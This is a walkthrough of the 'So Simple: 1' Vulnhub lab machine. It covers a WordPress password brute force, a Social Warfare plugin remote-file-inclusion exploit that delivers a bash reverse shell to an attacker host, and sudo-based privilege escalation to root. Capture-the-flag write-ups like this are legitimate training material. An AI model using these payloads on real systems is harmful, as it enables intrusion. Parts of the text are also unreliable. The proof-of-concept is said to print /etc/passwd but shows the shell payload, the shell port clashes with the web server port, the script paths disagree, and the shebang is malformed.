So Simple: 1 Vulnhub Walkthrough
MACHINE NAME: So Simple: 1
AUTHOR: https://www.vulnhub.com/author/roel,713/
DIFFICULTY: easy
Table of Contents
So Simple: 1 Vulnhub Walkthrough
Here is the description from vulnhub.com
This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag).
The VM is tested on Virtualbox. After the startup it shows the IP address.
Share your rootflag with me on Twitter: @roelvb79
Good luck and have fun!This works better with VirtualBox rather than VMware
Enumeration
nmap -sV -sC -sT 192.x.x.x
Nmap scan report for 192.x.x.x
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Since web services are running (HTTP is open) let’s run gobuster to brute force test if anything we know of exists on the web server.
Since there is nothing here to do the next logical step is to do some brute forcing of the web directories. Let’s use gobuster.
gobuster dir -u http://192.168.1.73 -w /usr/share/seclists/Discovery/Web-Content/common.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url: http://192.168.1.73
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)
And there it is /wordpress. That means we can now scan the running WordPress installation.
wpscan –url http://192.x.x.x/wordpress –enumerate –plugin-detection aggresive
This first wpscan found a user on the WordPress site, but we don’t yet have the password. To get the password let us try brute forcing authentication using a wordlist.
wpscan –url http://192.x.x.x/wordpress -U max -P /usr/share/wordlists/rockyou.txt
Bruteforcing the authentication against max and the passwords found in the rockyou.txt list comes back with a correct password, opensesame.
After I logged in using the credentials there isn’t much to see so let’s go back to the scan results for the site to look for vulnerable plugins and themes.
Exploit So Simple: 1
It turns out there is a vulnerable plugin installed named social warfare. Looking online I see that there is an available exploit.
Basically the exploit does these things:
- Using a PHP vulnerability there is a possibility for remote code execution AKA arbitrary code execution.
- A specially crafted command will execute any shell command on the machine we give it.
- The payload containing this command must be called remotely through a browser from the remote machine’s web server.
Let’s try the POC exploit code first to see if it really does work.
- Put this into exploit.txt:
<pre>system(“bash -c ‘bash -i >& /dev/tcp/kali-ip/8000 0>&1′”)</pre> - Start a Python web server to host the payload file: python -m SimpleHTTPServer 8000
- Then to call the payload visit this URL:
http://So-Simple-ip/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://kali-ip/exploit.txt
If the exploit works it should print the contents of the /etc/passwd file.
It does indeed. So make a new text file and write in these lines to use the plugin exploit to get our first shell on the machine.
First start a Python web server in the same directory as the exploit.txt file we are about to make.
- python -m SimpleHTTPServer 8000
- Start a netcat listener to get the shell back on Kali Linux: nc -lvp 4444
- Put this in exploit.txt:
<pre>system(“bash -c ‘bash -i >& /dev/tcp/kali-ip/8000 0>&1′”)</pre> - Call the payload by visiting this URL: http://So-Simple-ip/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://kali-ip/exploit.txt
So Simple: 1 Linux Privilege Escalation
Now that I am running as the www-data user on the So Simple: 1 machine I will enumerate using LinEnum.sh, found here. There is a ton of results, but nothing stands out as exploitable. Let’s look around the max user’s home directory /home/max.
Not much is here, but max does have a readable .ssh directory and inside it is an RSA private key and an RSA public key. These are commonly created when a new SSH keypair is generated for a user.
However what we can do is copy the key id_rsa and use it on Kali Linux to connect to the So Simple: 1 machine as max.
Why didn’t that work initially? The security on these RSA key files is tight you have to lock it down or the server won’t accept the connection.
Now max can run a single sudo command, but not as max. Huh? Right max can run a command as steven without needing steven’s password. Look at the results of sudo -l. This shows that max can run sudo -u steven /usr/sbin/service which is a Linux binary.
This Linux binary can run any service registered to the machine. That means it could be used also to open a new bash shell as steven.
Use this command: sudo -u steven /usr/sbin/service ../../bin/bash or ../../bin/sh
Now as steven I run the same command sudo -l to see what commands this user can run as sudo. Turns out there is one sudo -u root /opt/server-health.sh and steven can run this without root’s secret password.
Only it looks like the script doesn’t exist yet! So let’s make that directory and that script and put a command in it that open a new bash shell process as root.
Put this in the /opt/tools/server-health.sh script:
!#/bin/bash
bash
Now change permissions for the script so that steven can run it since steven can’t now.
# change permissions so we can run the script
chmod 777 server-health.sh
./server-health.sh
Running the script executes the command we snuck in there that will run a new bash shell process running as root which means we are now root.
That’s the root flag so we know we have pwned So Simple: 1 vulnhub machine and our walkthrough is now complete.
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
